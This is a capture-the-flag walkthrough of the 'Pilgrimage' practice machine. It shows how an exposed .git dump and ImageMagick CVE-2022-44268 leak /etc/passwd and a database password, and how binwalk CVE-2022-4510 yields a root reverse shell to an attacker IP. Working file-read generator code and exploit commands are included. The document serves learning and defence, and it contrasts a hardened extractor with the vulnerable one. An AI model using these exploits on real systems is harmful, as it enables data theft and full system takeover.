# Pilgrimage

## 1. nmap scan

![image](https://hackmd.io/_uploads/S1WKcmw4a.png)

Add the hostname to `/etc/hosts`:

```
sudo vim /etc/hosts
```

With `pilgrimage.htb` resolving, open the site in a browser. It lets you register your own account.

## 2. Directory dump

The site exposes its `.git` directory. Use git-dumper to pull the repository (either invocation works, depending on how git-dumper is installed):

```
./git_dumper.py http://pilgrimage.htb/.git git
./git-dumper http://[website.com]/.git [folder]
```

![image](https://hackmd.io/_uploads/r1TuJcvVa.png)

Reading the dump shows that the code uses ImageMagick (specifically the `magick convert` command) to resize uploaded files and saves the result under `/shrunk`.

![image](https://hackmd.io/_uploads/rySck5DET.png)

The repository ships its own `magick` binary. Run it to get the version:

```
./magick -h
./magick -usage
```

The version is 7.1.0-49.

![image](https://hackmd.io/_uploads/SkV3l5w4T.png)

## 3. PoC exploit

A Google search for "Magick 7.1.0-49" shows this version is affected by CVE-2022-44268, an arbitrary file read: when a PNG carries a `tEXt` chunk whose keyword is `profile`, ImageMagick reads the file named in that chunk and embeds its contents, hex-encoded, as a "Raw profile type" blob in the converted output.

```
git clone https://github.com/Sybil-Scan/imagemagick-lfi-poc
```

Generate a PNG that targets `/etc/passwd`:

```
python3 generate.py -f "/etc/passwd" -o exploit.png
```

This embeds the file-read payload in the image (it is a file read, not code execution).

![image](https://hackmd.io/_uploads/rkx0MqDVp.png)

Upload the image through the site, then download the resized copy from `/shrunk`:

```
wget http://pilgrimage.htb/shrunk/655a12e96398f.png
```

![image](https://hackmd.io/_uploads/S1nQX9vEa.png)

Inspect the downloaded image. The leaked file appears as a hex blob under "Raw profile type":

```
identify -verbose xxx.png
```

![image](https://hackmd.io/_uploads/ryMMNcD4p.png)

Decode the hex with CyberChef ("From Hex"); `xxd -r -p` does the same from the terminal. The decoded content includes:

```
emily:x:1000:1000:emily,,,:/home/emily:/bin/bash
```

![image](https://hackmd.io/_uploads/rJHer5wVT.png)

`dashboard.php` in the dump runs SQL queries against an SQLite database at `/var/db/pilgrimage`.

![image](https://hackmd.io/_uploads/Hyb5ScDNp.png)

Use CVE-2022-44268 again to read the database file:

```
python3 generate.py -f "/var/db/pilgrimage" -o abc.png
```

![image](https://hackmd.io/_uploads/r19MI9w4p.png)

![image](https://hackmd.io/_uploads/ryMrDcPNa.png)

The decoded SQLite file contains emily's password: `abigchonkyboi123`.

## 4. ssh login

Log in as emily over SSH with that password and read the first flag:

```
cat user.txt
```

(flag1)

![image](https://hackmd.io/_uploads/SySsucwVT.png)

## 5. Privilege escalation

```
ps -aux
```

The process list shows root running `/bin/bash /usr/sbin/malwarescan.sh`.

![image](https://hackmd.io/_uploads/rkXExiv46.png)

```
cat /usr/sbin/malwarescan.sh
```

![image](https://hackmd.io/_uploads/Sk9RfjwET.png)

Two items in the script matter: it watches `/var/www/pilgrimage.htb/shrunk/` and hands every new file there to `/usr/local/bin/binwalk`. Searching for `malwarescan.sh /var/www/pilgrimage.htb/shrunk/` turns up explanations of what the script does.

The binwalk it runs is v2.3.2. A Google search for "binwalk v2.3.2" shows this version is affected by CVE-2022-4510, a path traversal in binwalk's PFS filesystem extractor.
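The `generate.py` script from the Sybil-Scan repository is not reproduced above. As an added example of the same technique used in step 3 (my own code, not the repository's script or ImageMagick's code), the block below builds the probe PNG by hand and then decodes the hex blob that `identify -verbose` prints under "Raw profile type". The sample `identify` output is constructed for this example; the blob layout it assumes (a decimal length line followed by lines of hex, as ImageMagick writes raw profiles) matches what the screenshots show, and the chunk walker checks CRCs so you can confirm the file is a well-formed PNG before uploading it.

```python
#!/usr/bin/env python3
"""CVE-2022-44268 probe: build a PNG with a 'profile' tEXt chunk and decode the leaked file."""
import re
import struct
import sys
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_chunk(ctype: bytes, data: bytes) -> bytes:
    """length (big-endian) + type + data + CRC32 over type and data, per the PNG spec."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_probe_png(target_path: str) -> bytes:
    """1x1 8-bit grayscale PNG carrying tEXt 'profile' = target_path.
    ImageMagick 7.1.0-49 reads that path when it converts the image."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # width, height, depth, gray, deflate, filter, no interlace
    idat = zlib.compress(b"\x00\x00")                   # one scanline: filter byte 0 + one black pixel
    text = b"profile\x00" + target_path.encode()        # keyword NUL text
    return (PNG_SIG + png_chunk(b"IHDR", ihdr) + png_chunk(b"tEXt", text)
            + png_chunk(b"IDAT", idat) + png_chunk(b"IEND", b""))


def png_text_chunks(data: bytes) -> dict:
    """Walk the chunks, verify every CRC, return {keyword: text} for tEXt chunks."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos, found = len(PNG_SIG), {}
    while pos < len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC on {ctype!r} chunk")
        if ctype == b"tEXt":
            key, _, val = body.partition(b"\x00")
            found[key.decode("latin-1")] = val.decode("latin-1")
        pos += 12 + length
    return found


HEX_LINE = re.compile(r"^[0-9a-fA-F]+$")


def decode_raw_profile(identify_output: str) -> bytes:
    """Return the bytes hex-encoded after 'Raw profile type' in `identify -verbose` output.
    Layout assumed: optional blank/name line, a decimal length line, then hex lines."""
    lines = identify_output.splitlines()
    for i, line in enumerate(lines):
        if "Raw profile type" in line:
            break
    else:
        raise ValueError("no Raw profile type property found")
    hexparts, expected = [], None
    for line in lines[i + 1:]:
        s = line.strip()
        if not s:
            continue
        if expected is None and s.isdigit():  # length line written by ImageMagick
            expected = int(s)
            continue
        if not HEX_LINE.match(s):             # next property: the blob has ended
            break
        hexparts.append(s)
        if expected is not None and sum(map(len, hexparts)) >= expected * 2:
            break
    blob = bytes.fromhex("".join(hexparts))
    return blob if expected is None else blob[:expected]


# Constructed sample of what identify prints for a shrunk probe image (not real output).
SAMPLE_IDENTIFY = """\
Image:
  Filename: 655a12e96398f.png
  Format: PNG (Portable Network Graphics)
  Properties:
    Raw profile type:

      45
  726f6f743a783a303a303a726f6f743a2f726f6f743a2f62696e2f626173680a656d696c
  793a783a313030303a
    date:create: 2023-11-19T00:00:00+00:00
"""

if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else "/etc/passwd"
    with open("probe.png", "wb") as fh:
        fh.write(build_probe_png(path))
    print(decode_raw_profile(SAMPLE_IDENTIFY).decode())
```

Upload `probe.png`, fetch the `/shrunk` copy, and feed the text of `identify -verbose` on it to `decode_raw_profile`; the same decoder works for the SQLite file in the second read, since it returns raw bytes rather than text.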
![image](https://hackmd.io/_uploads/B1-P7oPVT.png)

## 6. Using the exploit-db PoC

![image](https://hackmd.io/_uploads/SJWNNivVp.png)

Save the exploit script locally:

```
nano [filename].py
```

![image](https://hackmd.io/_uploads/SJEgrjD46.png)

Copy an image into the same directory as `exp.py` and run the script against it. It appends the malicious payload (a binwalk plugin that spawns a reverse shell) to the image:

```
python3 exp.py exploit.png 10.10.14.47 9991
```

![image](https://hackmd.io/_uploads/SyNyDiPVp.png)

Start a listener on port 9991 on the attacking machine, serve the generated image over HTTP on port 8081 (the port the `wget` below expects), and download it into `/var/www/pilgrimage.htb/shrunk` on the target as emily:

```
wget http://10.10.14.47:8081/binwalk_exploit.png
```

![image](https://hackmd.io/_uploads/B1GbtjDET.png)

As soon as the download finishes, malwarescan.sh runs binwalk on the new file as root, the traversal drops the plugin where binwalk loads it, and the reverse shell connects back.

![image](https://hackmd.io/_uploads/HJhO_jv4p.png)

```
cat root.txt
```

(flag2)
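The exploit-db script used in step 6 is not reproduced above, and neither is binwalk's PFS code. As an added example (my own code, not the PoC's or binwalk's), the block below shows the mechanism behind CVE-2022-4510 in miniature: a PFS-style archive whose entry name contains `../`, an extractor that joins that name onto the output directory the way the vulnerable versions did, and a hardened extractor that refuses anything resolving outside that directory. The archive layout here (16-byte `PFS/0.9` header with a little-endian file count, fixed-width names, uid/size/offset records, data after the metadata) is this example's own simplification and is assumed, not a byte-exact copy of binwalk's parser; the point demonstrated is the unchecked join, which is the same whatever the exact field widths are.

```python
#!/usr/bin/env python3
"""Path traversal through an archive entry name, the bug class behind CVE-2022-4510."""
import os
import struct
import tempfile

PFS_MAGIC = b"PFS/0.9\x00"
NAME_WIDTH = 64  # fixed name field width assumed for this example


def build_pfs(entries: dict) -> bytes:
    """Pack {name: content} into a PFS-style blob: header, one record per file, then data."""
    header = PFS_MAGIC + b"\x00" * 6 + struct.pack("<H", len(entries))
    meta, data = b"", b""
    for name, content in entries.items():
        enc = name.encode()
        if len(enc) >= NAME_WIDTH:
            raise ValueError("name too long for this toy format")
        # record: name padded with NULs, then uid, size, offset (offset relative to end of metadata)
        meta += enc.ljust(NAME_WIDTH, b"\x00") + struct.pack("<III", 0, len(content), len(data))
        data += content
    return header + meta + data


def parse_pfs(blob: bytes):
    """Yield (name, content) pairs from a blob produced by build_pfs()."""
    if not blob.startswith(PFS_MAGIC):
        raise ValueError("bad magic")
    (count,) = struct.unpack("<H", blob[14:16])
    rec = NAME_WIDTH + 12
    data_start = 16 + count * rec
    for i in range(count):
        off = 16 + i * rec
        name = blob[off:off + NAME_WIDTH].rstrip(b"\x00").decode()
        _uid, size, data_off = struct.unpack("<III", blob[off + NAME_WIDTH:off + rec])
        yield name, blob[data_start + data_off:data_start + data_off + size]


def extract_unsafe(blob: bytes, out_dir: str) -> list:
    """The vulnerable pattern: os.path.join() trusts the name taken from the archive."""
    written = []
    for name, content in parse_pfs(blob):
        path = os.path.join(out_dir, name)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
        written.append(os.path.realpath(path))
    return written


def extract_safe(blob: bytes, out_dir: str) -> list:
    """Hardened: resolve the target and refuse any entry that escapes out_dir."""
    root = os.path.realpath(out_dir)
    written = []
    for name, content in parse_pfs(blob):
        path = os.path.realpath(os.path.join(root, name))
        if os.path.commonpath([root, path]) != root:
            raise ValueError(f"refusing path traversal: {name!r}")
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
        written.append(path)
    return written


def demo():
    """Extract an archive whose single entry climbs out of the extraction directory,
    mirroring how the public PoC plants ~/.config/binwalk/plugins/binwalk.py.
    Returns (path the unsafe extractor wrote, extraction dir, whether the safe one refused)."""
    base = tempfile.mkdtemp()
    out_dir = os.path.join(base, "work", "_image.png.extracted")
    os.makedirs(out_dir)
    # constructed payload: plugin body is a harmless comment here, not a reverse shell
    blob = build_pfs({"../../.config/binwalk/plugins/binwalk.py": b"# plugin body\n"})
    escaped = extract_unsafe(blob, out_dir)[0]
    try:
        extract_safe(blob, out_dir)
        refused = False
    except ValueError:
        refused = True
    return escaped, out_dir, refused


if __name__ == "__main__":
    escaped, out_dir, refused = demo()
    print("unsafe extractor wrote:", escaped)
    print("inside extraction dir? ", escaped.startswith(os.path.realpath(out_dir)))
    print("safe extractor refused:", refused)
```

Run it as a normal user and note that the unsafe path lands two directories above the extraction directory; when binwalk runs as root, as malwarescan.sh does on this box, the same climb reaches `/root/.config/binwalk/plugins/`, which is why dropping a file into `/shrunk` was enough.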